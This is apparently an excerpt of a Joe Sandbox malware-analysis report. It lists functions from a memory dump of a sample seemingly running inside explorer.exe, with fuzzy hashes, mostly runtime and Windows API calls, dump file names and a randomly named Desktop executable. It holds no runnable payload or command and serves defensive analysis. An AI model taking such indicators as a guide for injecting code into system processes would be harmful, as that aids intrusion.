Opcode Fuzzy Hash: 3d69cb35d8980570a57b3a0a16347bc290878ebac9dbd804cdb130f0a477ac7f
Instruction Fuzzy Hash: B551AF72A047069FDB299F54D9C0F6AB7A5FF04784F14422AEB06972E0D731E841EB98

Function 02EE9A20 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,F48E75C7,00000000), ref: 02EE9A99
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE9B00
GetProcAddress.KERNEL32(00000000), ref: 02EE9B07

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 0ddae22aae2ff8f88a5b7386293eff6f76a08b599541b8c5ef93b4e0e6b175dd
Instruction ID: af527391f30adfdfef7f926931ac48faf04f92076b8eb8edbff8bce1e38846b4
Opcode Fuzzy Hash: 0ddae22aae2ff8f88a5b7386293eff6f76a08b599541b8c5ef93b4e0e6b175dd
Instruction Fuzzy Hash: 37513770D502089BEF14EB78CD847DDBBB9EF45704F408299E40AA72C2EB749AC08F95

Function 02F05B10 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 02F05BE7
std::_Rethrow_future_exception.LIBCPMT ref: 02F05C39
std::_Rethrow_future_exception.LIBCPMT ref: 02F05C49

Part of subcall function 02EE3A60: __Mtx_unlock.LIBCPMT ref: 02EE3B54

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Mtx_unlockRethrow_future_exceptionstd::_
String ID:
API String ID: 3298230783-0
Opcode ID: bca3383d87730f2ede8f049e2abd3730f0357cb61ff252021e7ff8d68248b533
Instruction ID: 617d8e060a2eebd51fab6fefe626b5fb11e5729c0f48eb04e56454808214a1e7
Opcode Fuzzy Hash: bca3383d87730f2ede8f049e2abd3730f0357cb61ff252021e7ff8d68248b533
Instruction Fuzzy Hash: E3412AB1D003489BDF14EBB4D880BAFBBB9AF05380F40456DE74657681EB71A544CFA2

Function 02F26C2E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 02F26CFE
_free.LIBCMT ref: 02F26D27
SetEndOfFile.KERNEL32(00000000,02F2348F,00000000,02F16E41,?,?,?,?,?,?,?,02F2348F,02F16E41,00000000), ref: 02F26D59
GetLastError.KERNEL32(?,?,?,?,?,?,?,02F2348F,02F16E41,00000000,?,?,?,?,00000000), ref: 02F26D75

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 187f6273eeb0e0f8333c17208f040dedf7851755e95c260e3aefa7a6ed9cf104
Instruction ID: 50e8bc273d5b8a27dc4c44a45217a6c7177d7ba0ffd07aab9bb26e8424d55ba6
Opcode Fuzzy Hash: 187f6273eeb0e0f8333c17208f040dedf7851755e95c260e3aefa7a6ed9cf104
Instruction Fuzzy Hash: 1441D3729006199ADB156FB9CC44B9D77BBEF463E0FA40514EB15E72A0EB30D8488F21

Function 02EE2F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 02EE2F9F
GetCurrentThreadId.KERNEL32 ref: 02EE2FAB
__Mtx_unlock.LIBCPMT ref: 02EE2FF2
__Cnd_broadcast.LIBCPMT ref: 02EE2FFB

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: edb3e382f3b3e9ec7b8f425a2741d7e56058cc7aa708aa8a276f6a3732427374
Instruction ID: cb363fee9c54004f64b389e7a1893ab3aff03061424ead29d069816ee39adb6d
Opcode Fuzzy Hash: edb3e382f3b3e9ec7b8f425a2741d7e56058cc7aa708aa8a276f6a3732427374
Instruction Fuzzy Hash: 3D41BFB1A416159FDB11DF65C880B6AB7E8FF093A4F048569EA1AD7780EB31E904CBC1

Function 02F1EA55 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 02F0E64B: _free.LIBCMT ref: 02F0E659

Part of subcall function 02F1DEFF: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,02F17B47,0000FDE9,8B18EC83,?,?,?,02F178C0,0000FDE9,00000000,?), ref: 02F1DFAB

GetLastError.KERNEL32 ref: 02F1EABD
__dosmaperr.LIBCMT ref: 02F1EAC4
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02F1EB03
__dosmaperr.LIBCMT ref: 02F1EB0A

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 3ecdbc6c687bc3822ae0f066e9e9f73825bedb6a56e41569c5ed840fe296c06f
Instruction ID: 6a8bd1d600a0b2dfcb5c6ad73bacedb2de1b0459e7e8e00f83f9720895064ed6
Opcode Fuzzy Hash: 3ecdbc6c687bc3822ae0f066e9e9f73825bedb6a56e41569c5ed840fe296c06f
Instruction Fuzzy Hash: E0218671A04209AFDB20AF659C80D6BB7AEFF443E47844519FE1997290DB31EC508F90

Function 02F16820 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,?,02F17607,?,00000000,00000000,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010), ref: 02F16825
_free.LIBCMT ref: 02F16882
_free.LIBCMT ref: 02F168B8
SetLastError.KERNEL32(00000000,00000006,000000FF,?,02F17AC1,00000000,00000000,00000000,00000000,8B18EC83,02F43208,00000010,02F10B22,00000000,00000000,00000000), ref: 02F168C3

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: af657897ccf225ec25181b01ffdb355cc1884de9dd71ed011298eb6683945c9e
Instruction ID: f6851a8e2d33388ff006f3e4e970775469902f729fbbe399d54488c459ba8854
Opcode Fuzzy Hash: af657897ccf225ec25181b01ffdb355cc1884de9dd71ed011298eb6683945c9e
Instruction Fuzzy Hash: 0A11E576A442042BE61136B59CC4E2B769F9FD03F9BE40739FB24D61D0DF628816CE10

Function 02F07D58 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 02F07CB9: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,02F07D0B,00000014,?,02F07D4C,00000014,?,02EE2D32,00000000,00000014,00000000,F48E75C7), ref: 02F07CC5

__Mtx_unlock.LIBCPMT ref: 02F07D9E
FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,F48E75C7,?,?,?,Function_00048330,000000FF), ref: 02F07DC6
__Mtx_unlock.LIBCPMT ref: 02F07E01
__Cnd_broadcast.LIBCPMT ref: 02F07E12

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
String ID:
API String ID: 420990631-0
Opcode ID: 9b2bc23afb9f5cfcf92797320d6b0bd7de9284a391dad238905722ada41b1569
Instruction ID: c368a6503648548e4f28b7f182bfa21bf00c1efe3655d1b4c612fe873e1e1ba5
Opcode Fuzzy Hash: 9b2bc23afb9f5cfcf92797320d6b0bd7de9284a391dad238905722ada41b1569
Instruction Fuzzy Hash: 7611D636D41614EBEA117B61DC81A1FF7AAEB11BE0F00485AFB05972D1CF75E8119AA0

Function 02F16977 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(02F008E7,02F008E7,8B18EC83,02F10C77,02F17E78,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84,76F90F00), ref: 02F1697C
_free.LIBCMT ref: 02F169D9
_free.LIBCMT ref: 02F16A0F
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,02F09ABF,02F008E7,?,02F030BE,8B18EC84,76F90F00), ref: 02F16A1A

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 85b57b72fa7e63ede2775a2b884aea3f2775ada99062fdacd98194797077bc3c
Instruction ID: e0f7ff3e7d1c2d5185e9bc84cc75f002cb578e9607b724fff80818bc66b07e45
Opcode Fuzzy Hash: 85b57b72fa7e63ede2775a2b884aea3f2775ada99062fdacd98194797077bc3c
Instruction Fuzzy Hash: 66110477B442042BEA1136B89CC4E2B769F9BD03F9BE40329F724D31D4EF6288529610

Function 02F198EF Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,02F25439,?,?,?,00000020,00000001), ref: 02F19905
GetLastError.KERNEL32(?,02F25439,?,?,?,00000020,00000001), ref: 02F1990F
__dosmaperr.LIBCMT ref: 02F19916

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 9b0a7ec9d0eee2d6075ae9d0f3648dc2e27923ba5d6c9a1d9ca3149d85e18d2a
Instruction ID: b5ee28ab8831fdd0a5aa477bef5646b03921ac293b6e0b4606a878fb0abbf76b
Opcode Fuzzy Hash: 9b0a7ec9d0eee2d6075ae9d0f3648dc2e27923ba5d6c9a1d9ca3149d85e18d2a
Instruction Fuzzy Hash: BCF06D32A00119BB9B202BA2CC18A5BFF6EFF453E03844519F61DC6424CB71E861CBD0

Function 02F19958 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,02F253C4,?,?,?,?,00000020,00000001), ref: 02F1996E
GetLastError.KERNEL32(?,02F253C4,?,?,?,?,00000020,00000001), ref: 02F19978
__dosmaperr.LIBCMT ref: 02F1997F

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: a71ec04ae8626412ffb78d25914532997f0625c008a083428f895c513c4268fe
Instruction ID: 7de16143c0f0322b753169e1953b63415f12b35e23432cd52a03d18eb343647b
Opcode Fuzzy Hash: a71ec04ae8626412ffb78d25914532997f0625c008a083428f895c513c4268fe
Instruction Fuzzy Hash: 9EF03132A00119BBCB206FA7DC28D5AFF6AFF456E03854515FA1DC6524CB71E461DBD0

Function 02F26F9A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,00000000,?,02F23A84,00000000,00000001,00000000,00000000,?,02F17596,?,?,00000000), ref: 02F26FB1
GetLastError.KERNEL32(?,02F23A84,00000000,00000001,00000000,00000000,?,02F17596,?,?,00000000,?,00000000,?,02F17AE2,8B18EC83), ref: 02F26FBD

Part of subcall function 02F26F83: CloseHandle.KERNEL32(FFFFFFFE,02F26FCD,?,02F23A84,00000000,00000001,00000000,00000000,?,02F17596,?,?,00000000,?,00000000), ref: 02F26F93

___initconout.LIBCMT ref: 02F26FCD

Part of subcall function 02F26F45: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,02F26F74,02F23A71,00000000,?,02F17596,?,?,00000000,?), ref: 02F26F58

WriteConsoleW.KERNEL32(00000000,00000000,8B18EC83,00000000,?,02F23A84,00000000,00000001,00000000,00000000,?,02F17596,?,?,00000000,?), ref: 02F26FE2

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 8d51e4b296b63a1e5336d92c9f0c90a2707d88f0cc73e59cccddbfb517b9fac5
Instruction ID: 6452cea827ff593512d4421172f3c3a6f5cd371452222269b82d312e79421347
Opcode Fuzzy Hash: 8d51e4b296b63a1e5336d92c9f0c90a2707d88f0cc73e59cccddbfb517b9fac5
Instruction Fuzzy Hash: A8F01C3A84022DBBCF626FD1DC08E997F6BFB493E0B404414FA08C5120EA32C870DB90

Function 02F0985A Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNEL32(?,02F097F7,00000064,?,02EE8A41,02F4BDC0), ref: 02F0987D
LeaveCriticalSection.KERNEL32(02F47FA8,02F4BDC0,?,02F097F7,00000064,?,02EE8A41,02F4BDC0), ref: 02F09887
WaitForSingleObjectEx.KERNEL32(02F4BDC0,00000000,?,02F097F7,00000064,?,02EE8A41,02F4BDC0), ref: 02F09898
EnterCriticalSection.KERNEL32(02F47FA8,?,02F097F7,00000064,?,02EE8A41,02F4BDC0), ref: 02F0989F

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 9147b0a28a1ced1d6d73cfb3e83bb43053f6d8cd26e73db25708c80c188d6e68
Instruction ID: e9e9cbf5f87e81ea9ad2ac11b718105798413d804b7696da31fce33b41b23983
Opcode Fuzzy Hash: 9147b0a28a1ced1d6d73cfb3e83bb43053f6d8cd26e73db25708c80c188d6e68
Instruction Fuzzy Hash: 4EE01236EC5128ABEA023B50EC09A9EFF55BF14AE2B400615FA0966150CFF158719BD4

Function 02F1415B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02F14164

Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E

_free.LIBCMT ref: 02F14177
_free.LIBCMT ref: 02F14188
_free.LIBCMT ref: 02F14199

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12342684781bf7efcab4ac2531f5581436b4fb636ae850b2c993f13ca6cda46a
Instruction ID: a9dfd7a050fcde8764cc42288fec888b80f86dc51d3f153b6372377c99c01ca4
Opcode Fuzzy Hash: 12342684781bf7efcab4ac2531f5581436b4fb636ae850b2c993f13ca6cda46a
Instruction Fuzzy Hash: D0E04FFDC9156C9AD7523F10BC04805FAA2B728BD03510806E61C22210C7B21872AFC2

Function 02F12E7D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 02F12F0D

Strings

pow, xrefs: 02F12EE5, 02F12F02

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 14c78fbd0360217775f7ca502b3cd1a048690319a7ed0f4af3b8307fdaf4ec44
Instruction ID: b48c5cd7602fd6dc6a993be89e7d9eb3ade514880587a9b8939b4d115999786d
Opcode Fuzzy Hash: 14c78fbd0360217775f7ca502b3cd1a048690319a7ed0f4af3b8307fdaf4ec44
Instruction Fuzzy Hash: FE519A62F0810696CB15BB58C9503AA7BF4EB40BC4FE04D58EA96462D8EF35C4D1CF86

Function 02F135C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, xrefs: 02F13607, 02F1360E, 02F13644

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
API String ID: 0-433915104
Opcode ID: e80b5455520266f734a1e6412381912e36d428b28aa49f50a40f31473f2108e4
Instruction ID: 4f730fc4f61d6446a29615d39c3e590e30db3056dc7c208e01f36a5ed13173ca
Opcode Fuzzy Hash: e80b5455520266f734a1e6412381912e36d428b28aa49f50a40f31473f2108e4
Instruction Fuzzy Hash: 0E4193B1E00258AFDB25DF99CC81D9EBBFDEB94790F9000A6E604A7340DBB19A40CF50

Function 02F0CDBC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 02F0CDE1

Strings

MOC, xrefs: 02F0CDF3
RCC, xrefs: 02F0CDFB

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: c2a84fcdb258a1e6d1c4ae61d1a10b1abab10bb25dc53f1e97309153d38f82a6
Instruction ID: 383a9d6c97ce5cd4adb8d485bbc3dcbc94f8a97ff5ba39f76e77c6a9f8a13d55
Opcode Fuzzy Hash: c2a84fcdb258a1e6d1c4ae61d1a10b1abab10bb25dc53f1e97309153d38f82a6
Instruction Fuzzy Hash: 22412B71D00209AFCF15DF94CD80AAEBBB6FF48384F15825AFA04A7291D3759960EF51

Function 02EE44C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02EE44EB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 02EE453A

Part of subcall function 02F0863E: _Yarn.LIBCPMT ref: 02F0865D
Part of subcall function 02F0863E: _Yarn.LIBCPMT ref: 02F08681

Strings

bad locale name, xrefs: 02EE4556

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
